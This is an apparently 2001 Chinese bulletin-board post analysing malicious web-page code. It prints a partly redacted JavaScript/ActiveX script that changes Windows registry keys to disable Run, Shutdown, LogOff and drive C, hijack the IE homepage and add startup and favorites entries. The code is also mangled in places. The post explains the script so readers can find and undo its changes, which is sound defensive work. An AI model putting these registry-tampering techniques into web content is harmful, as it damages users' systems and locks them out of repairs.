computer 版 (精华区)

发信人: neverbw (浪子~新键盘好爽阿！), 信区: network
标  题: 抓住网页恶意代码的"黑手"(4)
发信站: 听涛站 (2001年09月19日11:56:21 星期三), 站内信件

程序讲解
　　笔者了 解一些有关Applet、ActiveX及脚本语言方面的知识，在下载含 有恶意代码
后 ，对其引用的Javascript脚本文件进行了一些分析。由于安全原因，请恕我不 能将
代码完整地写出来或者对程序的编写进行过细的讲解，只是 让大家了解到 这个代码并
不神秘。JAVA的最初应用就是Applet程序。虽然JAVA对Applet的安 全作出了限制，但由
于浏览器或语言漏洞的原因，当它与功能比较强大的脚本 语言结合时，这些小应用程序
常可凭借正常或诡秘的手段对用户 的机器进行修 改，比如修改注册表，运行相关的DO
S命令，在用户机器上安装木马或激活相 关的应用程序，其功能之强大远非单纯的网页
所能胜任，由此看来，现在网上 所流传的说什么浏览相关网页中病毒或者硬盘被格式化
也就见怪 不惊了。另外 ，还有一种嵌入式应用程序就是ActiveX，是微软的一种插件技
术，也可以象 Applet一样进行一些针对本机的操作。现在让我们了解一下以下代码编制
的机 理（如果你不了解脚本语言，可仅看看程序修改了哪些注册表表 项，然后找到 这
些表项并修改回来）。
document.write（"〈APPLET HEIGHT=0 WIDTH=0 code=.......〉〈 /APPLET〉"）; fi
le://嵌入Applet文件
function f）{ file://做出种种修改的语句就在这个函数里
try
{
//ActiveX initialization
a1=document.applets[0]; file://获取applet运行对象，以下语句指向注册表中有关I
E的表项
a1.setCLSID（"{.............}"）;
a1.createInstance（）;
Shl = a1.GetObject（）;
a1.setCLSID（"{.............}"）;
a1.createInstance（）;
FSO = a1.GetObject（）;
a1.setCLSID（"{.............}"）;
a1.createInstance（）;
Net = a1.GetObject（）;
try
{
if （ document.cookie.indexOf（"Chg"） == -1）
{
//以下是对操作系统相关注册表项值项的修改
//使系统没有“运行”项，以防止用户就不能通过注册表 编辑器 来修复设置。
Shl.RegWrite （ "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Polici
es\\ Explorer\\NoRun", 01, "REG_BINARY"）;
//让操作系统无“关闭系统” 选项
Shl.RegWrite （ "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Polici
es\\ Explorer\\NoClose", 01, "REG_BINARY"） ;
//让操作系统无“注销”选项
Shl.RegWrite （ "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Polici
es\\ Explorer\\NoLogOff", 01, "REG_BINARY"）;
注：使受害者系统没有“注销”项
//让操作系统无逻辑驱动器C
Shl.RegWrite （ "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Polici
es\\ Explorer\\NoDrives", "00000004", "REG_DWORD"）;
//禁止运行所有 的DOS应用程序；
Shl.RegWrite （ "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Polici
es\\ WinOldApp\\ Disabled","REG_BINARY"） ;
//让操作系统无法切换 至传统DOS的实模式下
Shl.RegWrite （ "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Polici
es\ \WinOldApp\\NoRealMode","REG_BINARY"） ;
// 让系统登录时显示一个登录窗口，以下是写入启动弹出对话 框标 题
Sh1.RegWrite （ "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ Winlog
on\\Legal NoticeCaption", "........"）;
// 写入启动弹出对话框内 容
Sh1.RegWrite （ "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ Winlog
on\\Legal NoticeText", "..............."）;
//以下是对IE 相关注册表项值项 的修改
// 设置浏览器默认主页
Sh1.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Pa
ge", ".............."）;
// 修改启动中的输入法启动项
Sh1.RegWrite （ "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ Run\\i
nternat.e xe", ".............."）;
// 设置注册不可更改
Sh1.RegWrite （ "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Polici
es\\WinOl dApp\\NoRealMode", "00000000", "REG_DWORD"）;
//修改 浏览器的标题栏
Shl.RegWrite （"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window T
itle", "..............."）;
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window T
itle", ".............."）;
// 以下程序是将含恶意代码的网页添加至 收藏夹中
var WF, Shor, loc;
WF = FSO.GetSpecialFolder（0）;
loc = WF + "\\Favorites";
if（!FSO.FolderExists（loc））
{
loc = FSO.GetDriveName （WF） + "\\Documents and Settings\\
" + Net.UserName + "\\Favorites";
if（FSO.FolderExists（ loc））
{
AddFavLnk（loc, "显示标题.....", "URL......" ）;
}
}
//设置 cookie值
var expdate = new Date（（new Date（ ））.getTime（） + （1））;
document.cookie="Chg=general; expires=" + expdate.toGMTString（ ） + "; path
=/;"
}
}
catch（e）
{}
}
catch（e）
{}
}
//初始化函数，并每隔一秒执行修 改程序
function init（）
{
setTimeout（"f（）", 1000）;
}
init（）;
"水来 土掩，兵来将挡"，让我们向恶意代码举起铁拳头！

--
当爱情不再完美我宁愿选择无悔不管来生多么美丽我无法失去今生对你的记忆!

※ 来源:·听涛站 tingtao.dhs.org·[FROM: 匿名天使的家]